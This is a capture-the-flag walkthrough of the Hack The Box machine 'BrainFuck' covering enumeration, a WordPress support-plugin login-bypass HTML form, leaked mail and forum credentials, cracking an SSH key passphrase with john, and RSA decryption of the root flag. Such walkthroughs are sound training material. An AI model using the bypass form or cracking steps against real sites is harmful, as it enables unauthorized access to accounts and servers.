BrainFuck - HackMD

###### tags: `hackthebox` `tutorials` `BrainFuck` `CTF` `hacking` `insane` # BrainFuck The BrainFuck was a nice quick box to go through on the hackthebox site. It was rated insane but it felt more like a medium box. The box had 2 virtual name servers which had two different sites. One was Wordpress and the other was text forum based on flarum. We had to exploit both the servers to gain SSH access to the box. The box also had an SMTP server that was not intended for exploitation but to merely interact. so let's get started! ## Nmap we start with the Nmap scan, so see which all ports are open on the box. ``` # Nmap 7.80 scan initiated Thu Mar 26 22:25:36 2020 as: Nmap -sC -sV -oN Nmap/brainfuck 10.10.10.17 Nmap scan report for 10.10.10.17 Host is up (0.41s latency). Not shown: 995 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA) | 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA) |_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519) 25/tcp open smtp? |_smtp-commands: Couldn't establish connection on port 25 110/tcp open pop3 Dovecot pop3d 143/tcp open tcpwrapped 443/tcp open https nginx/1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) | ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb | Not valid before: 2017-04-13T11:19:29 |_Not valid after: 2027-04-11T11:19:29 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | tls-nextprotoneg: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Mar 26 22:27:18 2020 -- 1 IP address (1 host up) scanned in 101.55 seconds ``` The Nmap reveals some interesting ports such as 25 and 110 which are for SMTP *(Simple Mail Transfer Protocol)* and POP *(Post Office Protocol)* respectively. Since port 443 which https is also open let's start with that as it has a wider attack surface. ## WebPage Enumeration The webpage by default showed the Nginx default page. So let's start with examing the SSL certificate for information such as usernames, email, domain name, etc. On examining the SSL certificate we found an email address and some DNS names ``` E = orestis@brainfuck.htb CN = brainfuck.htb OU = IT O = Brainfuck Ltd. L = Athens ST = Attica C = GR ====================================== DNS Name: www.brainfuck.htb DNS Name: sup3rs3cr3t.brainfuck.htb ``` Now lets update our /etc/hosts file with these enteries and examine the webpage again. Now we find two different content manager running on the two dns names. The www.brainfuck.htb has a WordPress running so we will use wpscan to examine it and the other has text forum which on some googling around revealed was running flarum. The text forum looks like it will require login credentials for further enumeration. Thus we will ignore it for now. Examining the wordpress scan output we get a bunch of details. ``` _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.9 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ URL: https://brainfuck.htb/ [10.10.10.17] Started: Fri Mar 27 18:07:57 2020 Interesting Finding(s): Headers | Interesting Entry: Server: nginx/1.10.0 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access https://brainfuck.htb/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% https://brainfuck.htb/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 WordPress version 4.7.3 identified (Insecure, released on 2017-03-06). | Found By: Rss Generator (Passive Detection) | - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator> | - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator> WordPress theme in use: proficient | Location: https://brainfuck.htb/wp-content/themes/proficient/ | Last Updated: 2020-03-02T00:00:00.000Z | Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt | The version is out of date, the latest version is 3.0.15 | Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3 | Style Name: Proficient | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof... | Author: Specia | Author URI: https://speciatheme.com/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.0.6 (80% confidence) | Found By: Style (Passive Detection) | - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6' Enumerating All Plugins (via Passive Methods) Checking Plugin Versions (via Passive and Aggressive Methods) Plugin(s) Identified: wp-support-plus-responsive-ticket-system | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/ | Last Updated: 2019-09-03T07:57:00.000Z | The version is out of date, the latest version is 9.1.2 | | Found By: Urls In Homepage (Passive Detection) | | Version: 7.1.3 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups -: |========================================================================================================================================| No Config Backups Found. No WPVulnDB API Token given, as a result, vulnerability data has not been output. You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up Finished: Fri Mar 27 18:08:13 2020 Requests Done: 53 Cached Requests: 5 Data Sent: 11.692 KB Data Received: 161.223 KB Memory used: 182.68 MB Elapsed time: 00:00:15 ``` we find that WordPress is vulnerable to the exploit https://www.exploit-db.com/exploits/41006 which will give the admin token with the password. Thus editing the exploit to suit our needs will giving us the following exploit code. ``` <form method="post" action="http://www.brainfuck.htb/wp-admin/admin-ajax.php"> Username: <input type="text" name="username" value="administrator"> <input type="hidden" name="email" value="sth"> <input type="hidden" name="action" value="loginGuestFacebook"> <input type="submit" value="Login"> </form> ``` Save it in a html file and open it with firefox and once done, go to wp-admin to view the dashboard. Enumerating the wordpress dashboard we find the smtp password. You view its value by using web browser's tool and inspecting the value. We get the credentials as ``` username: orestis@brainfuck.htb password: kHGuERB29DNiNE ``` ## SMTP Enumeration Since we SMTP credentials now let's open the **Blue Bird** and login into the SMTP server. Login is fairly simple. Just log in with username **orestis** and email as **orestis@brainfuck.htb** and password. Once in we find an email talking about the credentials of the text forum we found earlier. We find the credentials as the following. ``` username: orestis password: kIEnnfEKJ#9UmdO ``` ## The Text Forum Exploring the text forum we find them talking about the SSH Key in some sort of vignere encrypted key. Using Open Source tools such as dcode.fr does not work as we don't know the key. But we have something that looks like a URL. Since it is a URL and has 4 letters in the starting then it must start with https. Based on that we can derive a partial key, which in our case will be ``` FUCKM ``` Now using the dcode.fr we can derive the rest of the key. Enter this key in **Knowing Partial Key** section and paste the encrypted text. Thus we will rest of the key as: ``` FUCKMYBRAIN ``` Now since we know the Vignere key let's get ssh key URL and download the key. ## Getting Shell Once we get the SSH key it is encrypted with some password. Using ssh2john to convert the key to a hash and then using john with the RockYou wordlist gets us the password. ``` ssh2john id.rsa > hash john --wordlist=~/rockyou hash password found: 3poulakia! ``` We use that password and boom! we are in. And can read the user.txt file ``` cat user.txt 2c11cfbc5b959f73ac15a3310bd097c9 ``` ## Privelege Escalation In the home direcotry of the user **orestis** we find a file named encrypt.sage . On some enumeration, I found that it a scientific mathematical programming language that is used to calculations. But fortunately, it looks an RSA implementation and python can be used to decode the encrypted file. ``` nbits = 1024password = open("/root/root.txt").read().strip() enc_pass = open("output.txt","w") debug = open("debug.txt","w") m = Integer(int(password.encode('hex'),16))p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False) q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False) n = p*q phi = (p-1)*(q-1) e = ZZ.random_element(phi) while gcd(e, phi) != 1: e = ZZ.random_element(phi)c = pow(m, e, n) enc_pass.write('Encrypted Password: '+str(c)+'\n') debug.write(str(p)+'\n') debug.write(str(q)+'\n') debug.write(str(e)+'\n') ``` We have the things need to decode the RSA in debug file. So decoding the RSA encrypted text it should give us the root.txt file hash. I wrote a script in python that will help us to decode this RSA encryption. ``` from Crypto.Util.number import inverse, long_to_bytes p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307 q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079 e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997 enc = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182 phi = (p-1)*(q-1) d = inverse(e,phi) mess = pow(enc,d,p*q) mess = hex(mess) print mess print "password found" print str(mess).split('0x')[1][:-1].decode('hex') ``` Thus this gives the root.txt hash. I tired to get the root shell but it was not intended and i did'nt find any reliable path. Thus this was the box and will upload other linux OSCP boxes later.